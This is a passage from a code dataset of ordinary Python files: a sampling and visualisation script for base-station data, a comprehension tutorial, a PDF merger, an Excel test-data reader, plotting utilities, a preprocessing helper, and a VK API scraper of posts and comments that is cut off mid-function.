samplers_index[i][index_j] = temp; \r\n \r\ndef 
increase_ebt(samplers,samplers_index,all_data):\r\n len_samplers = len(samplers);\r\n for i in range(0,len_samplers):\r\n minE = -1; index_j = 0; temp_e = samplers[i][2][1]; \r\n len_j = len(samplers_index[i]);\r\n for j in range(0,len_j):\r\n j = j + random.randint(0,int(len_j/10));\r\n if(j >= len_j):\r\n break;\r\n tbd = samplers_index[i][j]; \r\n e = tbd[2][1];\r\n if(temp_e < e and minE < e - temp_e): \r\n minE = e - temp_e;\r\n index_j =j; \r\n if(index_j == 0):\r\n continue;\r\n print(samplers_index[i][index_j]);\r\n temp = samplers[i];\r\n samplers[i] = samplers_index[i][index_j];\r\n samplers_index[i][index_j] = temp;\r\n \r\ndef calcDistribution(samplers,all_data):\r\n interConnect = [];\r\n for item in all_data:\r\n if(type(item) != list):\r\n continue;\r\n if(item[7] != '0'):\r\n interConnect.append(item[7]);\r\n interConnect1 = [];\r\n for item in samplers:\r\n if(type(item) != list):\r\n continue;\r\n if(item[2][2] != '0'):\r\n interConnect1.append(item[2][2]);\r\n l1 = interConnect;\r\n l2 = [];\r\n [l2.append(i) for i in l1 if not i in l2];\r\n com_list= [];\r\n ori_dis = []; \r\n sam_dis = []; \r\n dict_con2index = {};\r\n index = 0;\r\n for item in l2:\r\n dict_con2index[item] = index;\r\n com_list.append(item);\r\n ori_dis.append(0);\r\n sam_dis.append(0);\r\n index += 1; \r\n for item in interConnect:\r\n index = dict_con2index[item];\r\n ori_dis[index] += 1;\r\n for item in interConnect1:\r\n index = dict_con2index[item];\r\n sam_dis[index] += 1;\r\n \r\n ori_pre = [];\r\n sam_pre = [];\r\n ori_sum = sum(ori_dis);\r\n sam_sum = sum(sam_dis);\r\n for item in ori_dis:\r\n ori_pre.append(item/ori_sum);\r\n for item in sam_dis:\r\n sam_pre.append(item/sam_sum);\r\n adjust = [];\r\n for i,j in zip(ori_pre,sam_pre):\r\n ad = int((i-j)*sam_sum);\r\n adjust.append(ad);\r\n dict_adjust = {};\r\n for i,j in zip(com_list,adjust):\r\n dict_adjust[i] = j;\r\n return dict_adjust;\r\n \r\ndef abjustInterConnectInCommunity(samplers,samplers_index,all_data,dict_adjustC):\r\n len_samplers = len(samplers);\r\n for i in range(0,len_samplers):\r\n temp_adjustC = samplers[i][2][2];\r\n if(temp_adjustC not in dict_adjustC):\r\n continue;\r\n temp_C = dict_adjustC[temp_adjustC];\r\n adjustC = '';\r\n C = 0;\r\n index_j = 0;\r\n if(temp_C == 0):\r\n continue; \r\n elif(temp_C > 0):\r\n min = 100;\r\n len_j = len(samplers_index[i]);\r\n for j in range(0,len_j):\r\n j = j + random.randint(0,int(len_j/10));\r\n if(j >= len_j):\r\n break;\r\n tbd = samplers_index[i][j];\r\n ajustC = tbd[2][2];\r\n if(ajustC not in dict_adjustC):\r\n continue;\r\n C = dict_adjustC[ajustC];\r\n if(C < 0 and min > C):\r\n min = C;\r\n index_j =j;\r\n adjustC = ajustC; \r\n \r\n if(index_j == 0):\r\n continue;\r\n temp = samplers[i];\r\n samplers[i] = samplers_index[i][index_j];\r\n samplers_index[i][index_j] = temp;\r\n # update the quotas, indexing by the community keys themselves\r\n dict_adjustC[temp_adjustC] = temp_C - 1;\r\n dict_adjustC[adjustC] = min + 1;\r\n else:\r\n max = -100;\r\n len_j = len(samplers_index[i]);\r\n for j in range(0,len_j):\r\n j = j + random.randint(0,int(len_j/10));\r\n if(j >= len_j):\r\n break;\r\n tbd = samplers_index[i][j];\r\n ajustC = tbd[2][2];\r\n if(ajustC not in dict_adjustC):\r\n continue;\r\n C = dict_adjustC[ajustC];\r\n if(C > 0 and max < C):\r\n max = C;\r\n index_j =j;\r\n adjustC = ajustC; \r\n \r\n if(index_j == 0):\r\n continue;\r\n temp = samplers[i];\r\n samplers[i] = samplers_index[i][index_j];\r\n samplers_index[i][index_j] = temp;\r\n dict_adjustC[temp_adjustC] = temp_C + 1;\r\n dict_adjustC[adjustC] = max - 1;\r\n \r\n# iterator\r\n# object: maintain the constraint 
community distribution,\r\n# high betweenness,line length distribution,\r\n# manner: set the seq and max Iters to replace the point\r\ndef ite_op(sampling_data,sampling_index,all_data,seq,max_iteration): \r\n iterations = 0;\r\n \r\n while (iterations <= max_iteration):\r\n iterations += 1;\r\n for k in seq:\r\n if (k == 0): \r\n remove_coverage(sampling_data,sampling_index,all_data);\r\n elif(k == 1):\r\n increase_ebt(sampling_data,sampling_index,all_data);\r\n else:\r\n dict_adjust = calcDistribution(sampling_data,all_data);\r\n abjustInterConnectInCommunity(sampling_data,sampling_index,all_data,dict_adjust);\r\n \r\ndef labelData(samples,samples_index,station_data):\r\n index = 0;\r\n for item1 in station_data:\r\n index2 = 0;\r\n for item2 in samples: \r\n if(item1[2] == item2[0] and item1[3] == item2[1]):\r\n station_data[index][4] = 1;\r\n samples[index2].append([item1[5],item1[6],item1[7],index]);\r\n break;\r\n index2 += 1; \r\n index +=1;\r\n\r\n for indexI in range(len(samples_index)):\r\n for indexJ in range(0,len(samples_index[indexI])):\r\n for indexS, itemS in enumerate(station_data):\r\n item = samples_index[indexI][indexJ];\r\n if(item[0] == itemS[2] and item[1] == itemS[3]):\r\n samples_index[indexI][indexJ].append([itemS[5],itemS[6],itemS[7],indexS]);\r\n break;\r\n\r\ndef generate_data(samples,station_data,w2v_name_file,samples_pos_file,samples_name_file):\r\n fo = open(w2v_name_file,'r',encoding=\"utf-8\");\r\n fw1 = open(samples_pos_file,'w',encoding=\"utf-8\");\r\n fw2 = open(samples_name_file,'w',encoding=\"utf-8\");\r\n output_data =[];\r\n index = 0;\r\n for line in fo.readlines():\r\n station_data[index].append(line);\r\n index +=1;\r\n for item1 in samples:\r\n for item in station_data:\r\n if(item[2] == item1[0] and item[3] == item1[1]):\r\n output_data.append(item);\r\n \r\n print(len(station_data),len(samples),len(output_data))\r\n\r\n for item in output_data:\r\n fw1.write(str(item[0])+ \" \"+str(item[1])+\"\\n\");\r\n fw2.write(item[8]);\r\n fw1.close();\r\n fw2.close();\r\n\r\ndef samples_label(all_labels_file,samples_name_file,samples_label_file):\r\n fo1 = open(all_labels_file,'r',encoding=\"utf-8\");\r\n fo2 = open(samples_name_file,'r',encoding=\"utf-8\");\r\n fw = open(samples_label_file,'w',encoding=\"utf-8\");\r\n \r\n dict_stations = {};\r\n index = 0;\r\n for line in fo1.readlines():\r\n term = line.strip().split(\",\"); \r\n index += 1;\r\n if (index > 1 ):\r\n dict_stations[term[0]] = term[1];\r\n label_list =[];\r\n for line in fo2.readlines():\r\n term = line.strip().split(\"-\");\r\n if(dict_stations[term[0]] == dict_stations[term[1]]):\r\n label = dict_stations[term[0]];\r\n else:\r\n label = \"-1\";\r\n label_list.append(label);\r\n fw.write(label + \"\\n\");\r\n print(\"end!\");\r\n\r\n l1 = label_list;\r\n l2 = [];\r\n [l2.append(i) for i in l1 if not i in l2] \r\n print(len(l2));\r\n print(l2);\r\n\r\ndef display(samples):\r\n pygame.init();\r\n screen = pygame.display.set_mode((500, 500));\r\n clock = pygame.time.Clock();\r\n while True:\r\n break_loop = False;\r\n clock.tick(60); \r\n screen.fill((0,0,0));\r\n pygame.draw.circle(screen, (50, 50, 200), (250, 250), 250, 1); \r\n for point in samples:\r\n lx = 250 + int((point[0]-0.5) * 250);\r\n ly = 250 + int((point[1]-0.5) * 250);\r\n pygame.draw.circle(screen, (255,255,255), (lx, ly), 2);\r\n \r\n pygame.display.flip();\r\n if break_loop:\r\n break\r\n\r\n#---------main program--------\r\n#init data file\r\nw_size = 200; w_fre = 1;\r\nori_file = 
'basestation_w2v'+str(w_size)+str(w_fre)+'2D';\r\n\r\nname_file = ori_file+ '_name.txt';\r\npos_file = ori_file+ '.txt';\r\nlabel_file = ori_file+'_label.txt';\r\ncoverage_file= ori_file+'_coverage.txt';\r\nebt_file = ori_file+'_ebt.txt';\r\n\r\nid2com_file = 'lineweight_Com.csv';\r\n\r\npds_r = 25;seq = [0,1,2];max_iteration = 10;\r\n\r\nsam_file = 'pds/basestation_w2v' + str(w_size)+str(w_fre)+'2D_MCpds'+str(pds_r);\r\n\r\nsamples_pos_file = sam_file +'.txt';\r\nsamples_name_file = sam_file +'_name.txt';\r\nsamples_label_file = sam_file +'_label.txt';\r\n\r\n# read points\r\nstation_data = readData(pos_file);\r\n# kde for adaptive sampling\r\nkde = kde_fun(station_data);\r\n# sampling\r\ngene_data = copy.deepcopy(station_data);\r\nsamples, samples_index = generate_points(kde,gene_data,station_data,pds_r);\r\n\r\nadd_coverage_attr(station_data,coverage_file);\r\nadd_ebt_attr(station_data,ebt_file);\r\nadd_com_attr(station_data, name_file, id2com_file);\r\nlabelData(samples,samples_index,station_data);\r\n\r\nite_op(samples, samples_index, station_data, seq, max_iteration);\r\n\r\n# write data\r\nprint('number of samples',len(samples));\r\ngenerate_data(samples,station_data,name_file,samples_pos_file,samples_name_file);\r\nsamples_label(id2com_file,samples_name_file,samples_label_file);\r\nprint(\"end!\");\r\n# display\r\ndisplay(samples);\r\n\r\n","sub_path":"station_pds.py","file_name":"station_pds.py","file_ext":"py","file_size_in_byte":16620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"399546957","text":"# list comprehensions\n# sets and dicts work too\n# tuples too (via generator expressions)\na = [1,2,3,4,5,6,7,8,9]\nb = [i**3 for i in a if i <=4]\nprint(b)\n\na = (1,2,3,4,5,6,7,8,9)\n# b = [i**3 for i in a if i <=5]\nb = (i**3 for i in a if i <=5)\nprint(b)\n# map and filter work as well\nlist_a=[1,2,3,4,5,6,7,8,9]\nr=filter(lambda x:x if x<=5 else 0,list_a)\ns=map(lambda x:x**3,filter(lambda x:x if x<=5 else 0,list_a))\nprint(tuple(r))\nprint(list(s))\n\nstudents ={\n 'wei':18,\n 'lai':19,\n 'wan':20\n}\nb = (key for key,value in students.items())\nprint(b)# <generator object>\nfor x in b:\n print(x)#wei#lai#wan\n\nstudents ={\n 'wei':18,\n 'lai':19,\n 'wan':20\n}\n\nb ={value:key for key,value in students.items()}\nprint(b)\n\n'''\nNone means empty; it is different from\nan empty string, an empty list, 0 and False\n\ndifferent type, different value\nprint(type(None)) # None is an instance of the NoneType class\n'''\nprint(type(None))\ndef fun():\n return None\n\na = []\nif not a:\n print('S')\nelse:\n print('F')\n\nif a is None:\n print('S')\nelse:\n print('F')\n\nclass Test():\n\n def __len__(self):\n print('len called')\n return True #(must be an int)\n\n def __bool__(self):\n print('bool called')\n return False\n\n\nprint(bool(Test()))","sub_path":"simple/a6进阶/None的详解.py","file_name":"None的详解.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"101689624","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport sys\nimport glob\nimport PyPDF2\n\ndef main():\n if len(sys.argv) != 3:\n sys.exit(\"usage : > python multiPDF2onePDF.py [DirectoryName] [OutputName]\")\n pdfout = PyPDF2.PdfFileWriter()\n for path in glob.glob(sys.argv[1] + '/*.pdf'):\n pdfin = PyPDF2.PdfFileReader(open(path, \"rb\"))\n for i in range(0, pdfin.getNumPages()):\n now_page = pdfin.getPage(i)\n pdfout.addPage(now_page)\n outputStream = open(sys.argv[2], \"wb\")\n pdfout.write(outputStream)\n outputStream.close()\n\nif __name__ == '__main__':\n 
sys.exit(main())\n\n","sub_path":"multiPDF2onePDF.py","file_name":"multiPDF2onePDF.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"422607001","text":"import xlrd\nimport json\n\nfrom config import BASE_DIR\n\n\n# def handler_excel(filename=r\"F:\\DHL_h5\\data\\login_data.xls\"): # 文件夹位置\ndef handler_excel(filename=BASE_DIR + \"./data/background_login_data1.xls\"): # 文件夹位置\n # 打开文件\n workbook = xlrd.open_workbook(filename)\n \"\"\"打开文件\"\"\"\n sheet1 = workbook.sheet_names()[0]\n \"\"\"获取sheet1\"\"\"\n table = workbook.sheet_by_name(sheet1)\n \"\"\"通过sheet1获取表格\"\"\"\n\n nrows = table.nrows\n \"\"\"表格中的行\"\"\"\n data_list = list() # 空列表\n data_list1 = list() # 空列表1\n data_list2 = list() # 空列表2\n for i in range(1, nrows): # 从第1行到第n行循环\n # print(table.row_values(i))#获取table中每行所有值\n # print(table.row_values(i)[2])#获取table中每行 中 特定列的值\n n = json.loads(table.row_values(i)[2]) # 将字符串转化成json(列表)\n data_list.append(n)\n \"\"\"n 追加到列表里面\"\"\"\n # print(list(n))\n # print(data_list)\n for e in data_list: # 循环这个列表获得username,password、expect....\n data_list1 = list() # 空列表1\n # print(e['username'])\n # print(e['password'])\n # print((e['code']))\n # print((e['expect']))\n data_list1.append(e['username'])\n data_list1.append(e['password'])\n data_list1.append(e['expect'])\n # print(data_list1)\n data_list2.append(data_list1)\n print(data_list2)\n return data_list2\n\n\nif __name__ == '__main__':\n handler_excel()\n","sub_path":"data/read_login_data.py","file_name":"read_login_data.py","file_ext":"py","file_size_in_byte":1604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"33900209","text":"\"\"\"\n数据可视化\n\"\"\"\nimport common\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom sklearn import preprocessing\nfrom data_processing.data_utils import get_clean_raw_data, num_features, bool_features\n\nfrom other.other_utils import beep\n\nfeatures = '../../data/3月用户相关数据.csv'\nlabel = '../../data/3月被投诉用户.csv'\n\n\ndef bool_feature_distribution():\n \"\"\"\n 对label分组,考察label关于不同布尔型特征的分布\n :return:\n \"\"\"\n data_all = get_clean_raw_data(features_file=features, label_file=label)\n\n # for col in bool_features:\n # print(data_all.groupby('label')[col].value_counts().unstack())\n\n grouped = data_all.groupby('label')\n for col in bool_features:\n toplot = grouped[col].value_counts().unstack()\n print(toplot)\n print('############################')\n # toplot.plot(kind='bar')\n # plt.show()\n\n\ndef num_scatter_all_magnifier():\n \"\"\"\n 数值型特征之间的二维散点图,包含0和1类\n :return:\n \"\"\"\n data_all = get_clean_raw_data(features_file=features, label_file=label)\n\n grouped = data_all.groupby('label')\n label1_df = grouped.get_group(1)\n label0_df = grouped.get_group(0)\n count = 0\n feature = ['beijiao_times', 'zhujiao_jt']\n for ind in range(100):\n for i, f1 in enumerate(feature):\n for f2 in feature[i + 1:]:\n label0_x = label0_df[f1]\n label0_y = label0_df[f2]\n label1_x = label1_df[f1]\n label1_y = label1_df[f2]\n fig, ax = plt.subplots()\n index = label1_df[f1].index\n view_point_x = label1_df[f1][index[ind]]\n view_point_y = label1_df[f2][index[ind]]\n print(f1, f2)\n print(view_point_x, view_point_y)\n view_scope_x = 10\n view_scope_y = 10\n ax.set_xlim(view_point_x - view_scope_x, view_point_x + view_scope_x)\n ax.set_ylim(view_point_y - view_scope_y, view_point_y + view_scope_y)\n\n ax.scatter(x=label0_x, y=label0_y, color='b', 
marker='x', label='label=0')\n ax.scatter(x=label1_x, y=label1_y, color='r', marker='+', label='label=1')\n ax.set_xlabel(f1)\n ax.set_ylabel(f2)\n ax.legend()\n plt.show()\n # ax = label0_df.plot.scatter(x=x1, y=x2, color='b', marker='x', label='label=0')\n # label1_df.plot.scatter(x=x1, y=x2, color='r', marker='+', label='label=1', ax=ax)\n # plt.show()\n # plt.savefig('../notes/image/scatter-all/' + x1 + '--' + x2)\n # plt.savefig('../../notes/image/scatter-all-no-outlier/' + x1 + '--' + x2)\n count += 1\n print(count)\n print('done')\n print('all:', count)\n\n\ndef num_scatter_all():\n \"\"\"\n 数值型特征之间的二维散点图,包含0和1类\n :return:\n \"\"\"\n data_all = get_clean_raw_data(features_file=features, label_file=label)\n print(data_all.shape)\n grouped = data_all.groupby('label')\n label1_df = grouped.get_group(1)\n label0_df = grouped.get_group(0)\n count = 0\n for i, x1 in enumerate(num_features):\n for x2 in num_features[i + 1:]:\n print(x2)\n ax = label0_df.plot.scatter(x=x1, y=x2, color='b', marker='x', label='label=0')\n label1_df.plot.scatter(x=x1, y=x2, color='r', marker='+', label='label=1', ax=ax)\n # plt.show()\n plt.savefig('../../notes/image/scatter-all-delete-outliers/' + x1 + '--' + x2)\n count += 1\n print(count)\n print('done')\n print('all:', count)\n\n\ndef num_scatter_1():\n \"\"\"\n 数值型特征之间的二维散点图,只包含1类\n :return:\n \"\"\"\n data_all = get_clean_raw_data(features_file=features, label_file=label)\n grouped = data_all.groupby('label')\n label1_df = grouped.get_group(1)\n count = 0\n for i, x1 in enumerate(num_features):\n for x2 in num_features[i + 1:]:\n label1_df.plot.scatter(x=x1, y=x2, color='r', marker='+', label='label=1')\n plt.show()\n # plt.savefig('../notes/image/scatter-1/' + x1 + '--' + x2)\n count += 1\n print(count)\n print('done')\n print('all:', count)\n\n\ndef box_plot():\n \"\"\"\n 盒图\n :return:\n \"\"\"\n data_all = get_clean_raw_data(features_file=features, label_file=label)\n # data = preprocessing.scale(data_all)\n data = pd.DataFrame(data_all)[num_features]\n # num_features,bool_features\n for col in num_features:\n data[col].plot.box()\n plt.show()\n\n\ndef pie_bool_all():\n \"\"\"\n 布尔型特征,饼图,正负两类\n :return:\n \"\"\"\n data_all = get_clean_raw_data(features_file=features, label_file=label)\n bin_label = ['0', '1']\n for col in bool_features:\n df = data_all[col].value_counts()\n print(df)\n size_0 = df[0]\n size_1 = df[1]\n sizes = [size_0, size_1]\n plt.figure()\n plt.pie(sizes, labels=bin_label, autopct='%1.1f%%')\n plt.title(col + '\\nlabel=0,1')\n # plt.show()\n plt.savefig('../notes/image/pie-all/' + col)\n\n\ndef bar_bool_0vs1_label():\n \"\"\"\n 布尔型特征,条形图,0类中某布尔特征的分布和1类中该布尔特征的分布\n :return:\n \"\"\"\n data_all = get_clean_raw_data(features_file=features, label_file=label)\n grouped = data_all.groupby('label')\n for col in bool_features:\n df = grouped[col].value_counts().unstack()\n print(df)\n l0f0 = df.iat[0, 0] # label == 0 ,feature==0\n l0f1 = df.iat[0, 1]\n l1f0 = df.iat[1, 0]\n l1f1 = df.iat[1, 1]\n plt.figure()\n plt.suptitle(col, fontsize=14)\n index = [0, 1]\n\n plt.subplot(121)\n plt.title('label=0')\n plt.bar(index, [l0f0, l0f1], color=['#1F77B3', 'r'])\n # 设置数字标注\n for a, b in zip(index, [l0f0, l0f1]):\n plt.text(a, b + 0.05, '%.0f' % b, ha='center', va='bottom', fontsize=10)\n plt.xticks(index, ['0\\n' + col, '1\\n' + col])\n\n plt.subplot(122)\n plt.bar(index, [l1f0, l1f1], color=['#1F77B3', 'r'])\n plt.title('label=1')\n for a, b in zip(index, [l1f0, l1f1]):\n plt.text(a, b + 0.05, '%.0f' % b, ha='center', va='bottom', fontsize=10)\n 
plt.xticks(index, ['0\\n' + col, '1\\n' + col])\n plt.savefig('../notes/image/bar-0vs1-label/' + col)\n\n\ndef bar_bool_0vs1_feature():\n \"\"\"\n 布尔型特征,条形图,某布尔特征为0时,label的分布;某布尔特征为1时,label的分布;\n :return:\n \"\"\"\n data_all = get_clean_raw_data(features_file=features, label_file=label)\n grouped = data_all.groupby('label')\n for col in bool_features:\n df = grouped[col].value_counts().unstack()\n print(df)\n l0f0 = df.iat[0, 0] # label == 0 ,feature==0\n l1f0 = df.iat[1, 0]\n l0f1 = df.iat[0, 1]\n l1f1 = df.iat[1, 1]\n plt.figure()\n plt.suptitle(col, fontsize=14)\n index = [0, 1]\n\n plt.subplot(121)\n y0 = [l0f0, l1f0]\n plt.bar(index, y0, color=['#1F77B3', 'r'])\n # 设置数字标注\n for a, b in zip(index, y0):\n plt.text(a, b + 0.05, '%.0f' % b, ha='center', va='bottom', fontsize=10)\n plt.title(col + '=0')\n plt.xticks(index, ['label=0', 'label=1'])\n\n plt.subplot(122)\n y1 = [l0f1, l1f1]\n plt.bar(index, y1, color=['#1F77B3', 'r'])\n for a, b in zip(index, y1):\n plt.text(a, b + 0.05, '%.0f' % b, ha='center', va='bottom', fontsize=10)\n plt.xticks(index, ['label=0', 'label=1'])\n plt.title(col + '=1')\n\n # plt.show()\n plt.savefig('../notes/image/bar-0vs1-feature/' + col)\n\n\ndef kde_plot_all():\n \"\"\"\n 密度图,数值型特征\n :return:\n \"\"\"\n data_all = get_clean_raw_data(features_file=features, label_file=label)\n beep()\n for col in num_features:\n print(col)\n plt.figure()\n data_all[col].plot(kind='kde')\n plt.title(col)\n plt.legend()\n if col == 'mon_use_days' or col == 'open_day' or col == 'use_days':\n plt.xlim(xmin=0, xmax=32)\n elif col == 'zhujiao' or col == 'zhujiao_jt' or col == 'total_count' or \\\n col == 'open' or col == 'close' or col == 'cell_num':\n plt.xlim(xmin=-2000)\n elif col == 'zhujiao_time' or col == 'roam_duration_02':\n plt.xlim(xmin=-20000)\n elif col == 'is_p_app_wx_times':\n plt.xlim(xmin=-100000)\n else:\n plt.xlim(xmin=-200)\n plt.plot(linewidth=20.0)\n plt.show()\n # plt.savefig('../notes/image/kde-all/' + col)\n beep()\n\n\ndef hist_plot_all():\n \"\"\"\n 直方图(密度图有缺陷),数值型特征\n :return:\n \"\"\"\n # from sklearn.preprocessing import StandardScaler\n data = get_clean_raw_data(features_file=features, label_file=label)\n # X = data[num_features]\n # scaler = StandardScaler()\n # X = scaler.fit_transform(X)\n # print(X.mean())\n # print(X.std())\n # data = pd.DataFrame(X, columns=num_features)\n for col in num_features:\n plt.figure()\n x = np.array(data[col])\n \n # x = np.sqrt(x)\n # plt.hist(x, bins=300, log=True)\n plt.hist(x,bins=100)\n plt.title(col)\n plt.show()\n # plt.savefig('../notes/image/hist-all/' + col)\n\n\ndef hist_plot_0vs1():\n data = get_clean_raw_data(features_file=features, label_file=label)\n grouped = data.groupby('label')\n label1_df = grouped.get_group(1)\n label0_df = grouped.get_group(0)\n beep()\n num_features = ['beijiao_times', 'use_days', 'zhujiao', 'beijiao', 'open', 'close', 'open_day']\n for col in num_features:\n plt.figure()\n plt.suptitle(col, fontsize=14)\n\n plt.subplot(211)\n x = np.array(label0_df[col])\n plt.hist(x, bins=300, log=False)\n # label0_df[col].plot(kind='hist')\n plt.xlabel('label=0')\n\n plt.subplot(212)\n x = np.array(label1_df[col])\n plt.hist(x, bins=30, log=False, color='r')\n # label1_df[col].plot(kind='hist')\n plt.xlabel('label=1')\n\n plt.show()\n # plt.savefig('../notes/image/hist-0vs1/' + col)\n beep()\n\n\ndef kde_plot_0vs1():\n data_all = get_clean_raw_data(features_file=features, label_file=label)\n grouped = data_all.groupby('label')\n beep()\n for col in num_features:\n plt.figure()\n 
grouped[col].plot(kind='kde', legend=True)\n if col == 'mon_use_days' or col == 'use_days' or col == 'open_day':\n plt.xlim(xmin=0, xmax=32)\n elif col == 'zhujiao' or col == 'zhujiao_jt' or col == 'total_count' or \\\n col == 'open' or col == 'close' or col == 'cell_num':\n plt.xlim(xmin=-2000)\n elif col == 'zhujiao_time' or col == 'roam_duration_02':\n plt.xlim(xmin=-20000)\n elif col == 'is_p_app_wx_times':\n plt.xlim(xmin=-100000)\n else:\n plt.xlim(xmin=-200)\n plt.plot(linewidth=20.0)\n plt.title(col)\n plt.savefig('../notes/image/kde-0vs1/' + col)\n\n beep()\n\n\ndef kde_open_wxtimes_close_cell_num_0vs1():\n \"\"\"\n 统计分布奇怪的特征\n :return:\n \"\"\"\n strange = ['open', 'is_p_app_wx_times', 'close', 'cell_num']\n data = get_clean_raw_data(features_file=features, label_file=label)\n grouped = data.groupby('label')\n label1_df = grouped.get_group(1)\n label0_df = grouped.get_group(0)\n\n beep()\n for col in strange:\n plt.figure()\n plt.suptitle(col, fontsize=14)\n\n if col == 'open':\n plt.xlim(xmin=-5000)\n elif 'close' or col == 'cell_num':\n plt.xlim(xmin=-10000)\n elif col == 'is_p_app_wx_times':\n plt.xlim(xmin=-500000)\n\n plt.subplot(211)\n label0_df[col].plot(kind='hist')\n plt.xlabel('label=0')\n\n plt.subplot(212)\n label1_df[col].plot(kind='hist')\n plt.xlabel('label=1')\n\n plt.show()\n beep()\n\n\ndef quantile_raw():\n \"\"\"\n 未清理的数据的分位数图\n :return:\n \"\"\"\n data = pd.read_csv(features, encoding='utf-8', low_memory=False)\n complain_users = pd.read_csv(label, encoding='utf-8')[\"user_id\"]\n all_users_id = data[\"user_id\"]\n labels = all_users_id.isin(complain_users).astype(\"int\")\n data[\"label\"] = labels\n\n x = np.arange(0, 101, 1)/100\n for col in num_features:\n f = data[col]\n y = np.zeros(len(x))\n for i, v in enumerate(x):\n y[i] = f.quantile(v)\n\n plt.figure()\n plt.scatter(x=x, y=y, s=3, marker='o')\n plt.title(col)\n plt.savefig('../../notes/image/quantile-raw/' + col)\n # plt.show()\n\n\ndef quantile_washed():\n \"\"\"\n 清理后的数据的分位数图\n :return:\n \"\"\"\n data = get_clean_raw_data(features_file=features, label_file=label)\n\n x = np.arange(0, 101, 1)/100\n\n for col in num_features:\n y = np.zeros(len(x))\n f = data[col]\n\n for i, v in enumerate(x):\n y[i] = f.quantile(v)\n\n plt.figure()\n plt.scatter(x=x, y=y, marker='o', s=3, color='green')\n plt.title(col)\n # plt.savefig('../../notes/image/quantile-washed/' + col)\n plt.show()\n\n\ndef main():\n quantile_washed()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"experiments/src/visualization/basic_graph.py","file_name":"basic_graph.py","file_ext":"py","file_size_in_byte":13508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"505673727","text":"__license__ = 'MIT License '\n__author__ = 'Lucas Theis '\n__docformat__ = 'epytext'\n\nfrom numpy import log, array, asarray, mean, std\nfrom numpy.random import randn, permutation\nfrom numpy.linalg import eig\n\ndef preprocess(data, shuffle=True, noise_level=None):\n\t\"\"\"\n\tLog-transforms and centers the data. 
Optionally, adds some noise.\n\tThe standard deviation of the added Gaussian noise is 1 / C{noise_level}.\n\n\t@type data: array_like\n\t@param data: data points stored in columns\n\n\t@type shuffle: boolean\n\t@param shuffle: whether or not to randomize the order of the data\n\n\t@type noise_level: integer\n\t@param noise_level: add a little bit of noise after log-transform\n\n\t@rtype: ndarray\n\t@return: preprocessed data\n\t\"\"\"\n\n\tdata = array(data, dtype='float64')\n\n\t# log-transform\n\tdata[data < 1.] = 1.\n\tdata = log(data)\n\n\t# randomize order\n\tif shuffle:\n\t\tdata = data[:, permutation(data.shape[1])]\n\n\t# center\n\tdata = data - mean(data, 1).reshape(-1, 1)\n\n\tif noise_level is not None:\n\t\t# add Gaussian white noise\n\t\tdata += randn(*data.shape) * (std(data) / float(noise_level))\n\n\treturn asarray(data, order='F')\n","sub_path":"code/tools/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"411336513","text":"import urllib.request, json, re, os\n\ndef get_wall(no):\n url = 'https://api.vk.com/method/wall.get?count=100&owner_id=' + no\n posts = {}\n comments = {}\n for i in [0,100,200,300,400]:\n if i!=0:\n url = url + '&offset=' + str(i)\n res = urllib.request.urlopen(url).read().decode('utf-8')\n wall = json.loads(res)\n wall = wall['response'][1:]\n for post in wall:\n if post['marked_as_ads'] == 0:\n post_id = post['id']\n print('post_id - '+str(post_id))\n comm_count = post['comments']['count']\n post_info = {}\n post_info['words'] = count_words(post['text'])\n post_info['likes'] = post['likes']['count']\n posts[post_id] = post_info\n com = get_comments(no, post_id, comm_count)\n for k, v in com.items():\n comments[k] = v\n return posts, comments\n \n\ndef get_comments(no, post_id, count):\n comments = {}\n url_comm = 'https://api.vk.com/method/wall.getComments?owner_id='+no \\\n +'&need_likes=1&post_id='+str(post_id)\n tens = int(count/10) + 1\n print('how many tens of comms - ' + str(tens))\n for i in range(tens): \n res_comm = urllib.request.urlopen(url_comm).read().decode('utf-8')\n comms = json.loads(res_comm)\n comms = comms['response'][1:]\n for com in comms:\n com_info = {}\n print('comm_id - '+str(com['cid']))\n com_info['words'] = count_words(com['text'])\n com_info['likes'] = com['likes']['count']\n com_info['from_who'] = get_user_info(com['from_id'])\n comments[com['cid']] = com_info\n return comments\n \n \ndef get_user_info(user_id):\n print('user_id - '+str(user_id))\n user_info = {}\n if user_id > 0:\n url = 'https://api.vk.com/method/users.get?fields=bdate,city&' \\\n + 'user_ids=' + str(user_id)\n res = urllib.request.urlopen(url).read().decode('utf-8')\n user = json.loads(res)\n user = user['response'][0] \n if 'bdate' in user:\n user_info['bdate'] = good_bd(user['bdate'])\n else:\n user_info['bdate'] = '-'\n if 'city' in user:\n if user['city'] != 0: \n user_info['city'] = get_city_name(user['city'])\n else:\n user_info['city'] = '-'\n else:\n user_info['city'] = '-'\n else:\n user_info['bdate'] = '-'\n user_info['city'] = '-'\n return user_info\n\n \ndef count_words(text):\n words = text.split()\n return len(words)\n\n\ndef get_city_name(city_id):\n print('city_id - '+str(city_id))\n url_city = 'https://api.vk.com/method/database.getCitiesById?city_ids='\\\n + str(city_id)\n res_city = urllib.request.urlopen(url_city).read().decode('utf-8')\n city = json.loads(res_city)\n city = 
